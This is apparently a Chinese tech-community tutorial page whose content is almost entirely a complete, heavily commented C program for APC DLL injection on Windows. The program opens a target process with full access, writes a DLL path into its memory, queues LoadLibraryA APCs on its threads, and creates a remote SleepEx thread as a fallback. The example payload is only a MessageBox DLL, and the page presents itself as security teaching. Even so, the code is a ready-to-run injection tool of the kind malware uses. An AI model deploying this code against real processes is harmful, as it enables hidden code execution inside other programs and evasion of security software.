历程注入说人话系列：Windows API安全实战-APC注入 - qidao123.com技术社区-IT企服评测·应用市场

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
BOOL InjectAPC(DWORD dwPid, const char* dllPath) {
/*
dwPid: 目标进程的PID
dllPath: 要注入的DLL路径
*/
// 打开目标进程
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS, // 指定打开进程的权限，这里指定为所有权限
FALSE, // 指定是否继承句柄
dwPid // 指定要打开的进程ID
);
if (hProcess == NULL) {
printf("[-] 打开进程失败: %d\n", GetLastError());
return FALSE;
}
// 在目标进程中分配内存
LPVOID pRemotePath = VirtualAllocEx(
hProcess, // 指定目标进程
NULL, // 指定目标内存地址，这里指定为 NULL，因为要分配内存
strlen(dllPath) + 1, // 指定要分配的内存大小，这里指定为 DLL 路径的长度 + 1，因为需要包含 NULL 终止符
MEM_COMMIT | MEM_RESERVE, // 指定内存分配的类型，这里指定为可提交和保留内存
PAGE_READWRITE // 指定内存的访问权限，这里指定为可读写
);
if (pRemotePath == NULL) {
printf("[-] 内存分配失败: %d\n", GetLastError());
CloseHandle(hProcess);
return FALSE;
}
// 写入 DLL 路径到目标进程内存
if (!WriteProcessMemory(
hProcess, // 指定要写入数据的目标进程
pRemotePath, // 指定目标内存地址，这里指定为在目标进程中分配的pRemotePath内存地址
dllPath, // 源数据地址信息，也就是DLL路径
strlen(dllPath) + 1, // 要写入的字节数，这里指定为 DLL 路径的长度 + 1，因为需要包含 NULL 终止符
NULL // 可选参数，标识实际写入了多少字节数。
)) {
printf("[-] 写入内存失败: %d\n", GetLastError());
VirtualFreeEx(hProcess, pRemotePath, 0, MEM_RELEASE);
CloseHandle(hProcess);
return FALSE;
}
// 获取 LoadLibraryA 函数地址，固定写法。从 kernel32.dll 中获取LoadLibraryA的内存地址用于挂载APC
LPTHREAD_START_ROUTINE pLoadLibraryA = (LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandleA("kernel32.dll"), "LoadLibraryA"
);
if (pLoadLibraryA == NULL) {
printf("[-] 获取 LoadLibraryA 函数地址失败: %d\n", GetLastError());
VirtualFreeEx(hProcess, pRemotePath, 0, MEM_RELEASE);
CloseHandle(hProcess);
return FALSE;
}
// 获取当前系统中所有线程的快照
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
printf("[-] 获取线程快照失败: %d\n", GetLastError());
return FALSE;
}
THREADENTRY32 te = { sizeof(THREADENTRY32) };
DWORD successCount = 0;
// 这里通过获取到的线程快照中所属的进程ID与目标进程的PID进行对比，如果相同则打开该线程
if (Thread32First(hSnapshot, &te)) {
do {
if (te.th32OwnerProcessID == dwPid) {
// 打开匹配到的目标进程的线程
HANDLE hThread = OpenThread(
// 指定打开线程的权限。APC需要用到的权限：THREAD_SET_CONTEXT 允许设置线程的上下文。THREAD_SUSPEND_RESUME 允许挂起和恢复线程。THREAD_QUERY_INFORMATION 允许查询线程信息。
THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME | THREAD_QUERY_INFORMATION,
FALSE, // 指定是否继承句柄
te.th32ThreadID // 指定要打开的线程ID
);
if (hThread) {
// 挂载 APC 到目标进程的线程，
DWORD res = QueueUserAPC(
(PAPCFUNC)pLoadLibraryA, // 指定要执行的函数，这里指定为 LoadLibraryA 函数，由LoadLibraryA 函数加载目标DLL 到目标进程
hThread, // 指定目标线程，这里指定为当前遍历到的线程
(ULONG_PTR)pRemotePath // 指定要传递的参数，这里指定为目标DLL 的路径
);
if (res) {
printf("[+] 设置APC任务的线程ID: %d\n", te.th32ThreadID);
successCount++;
}
CloseHandle(hThread);
}
else {
printf("[-] OpenThread失败！线程ID: %d, 错误码: %d\n", te.th32ThreadID, GetLastError());
}
}
} while (Thread32Next(hSnapshot, &te));
}
CloseHandle(hSnapshot);
// 新创建一个远程 SleepEx(INFINITE, TRUE) 线程 + 挂载 APC。保底方案，如果所有线程都不 Alertable，则创建一个线程并挂载 APC
HANDLE hSleepThread = CreateRemoteThread(
hProcess, // 指定目标进程
NULL, // 线程属性
0, // 线程栈大小
(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32.dll"), "SleepEx"), // 指定要执行的函数，这里指定为 SleepEx 函数，由 SleepEx 函数挂载 APC
(LPVOID)INFINITE, // 传递INFINITE 作为休眠时间，INFINITE是一个宏，表示无限休眠
0, // 创建标志
NULL // 线程ID
);
if (hSleepThread) {
DWORD result = QueueUserAPC(
(PAPCFUNC)pLoadLibraryA, // 指定要执行的函数，这里指定为 LoadLibraryA 函数，由LoadLibraryA 函数加载目标DLL 到目标进程
hSleepThread, // 指定目标线程，这里指定为通过CreateRemoteThread创建的线程
(ULONG_PTR)pRemotePath // 指定要传递的参数，这里指定为目标DLL 的路径
);
if (result) {
printf("[+] 成功挂载 APC 到新建 SleepEx 线程（强制 Alertable）！\n");
successCount++;
}
else {
printf("[-] QueueUserAPC 到 SleepEx 线程失败: %d\n", GetLastError());
}
// 线程保持运行，由系统回收；如果想控制它结束，DLL里可以清理
CloseHandle(hSleepThread);
}
else {
printf("[-] 创建远程 SleepEx 线程失败: %d\n", GetLastError());
}
CloseHandle(hProcess);
if (successCount > 0) {
printf("[+] APC 注入尝试完成！至少有一个线程进入 Alertable 状态。\n");
return TRUE;
}
else {
printf("[-] 所有线程都不 Alertable，DLL 注入失败。\n");
return FALSE;
}
}
int main() {
DWORD pid = 26912;
const char* dllPath = "D:\\MessageBox-DLL\\InjectMe.dll";
InjectAPC(pid, dllPath);
return 0;
}

复制代码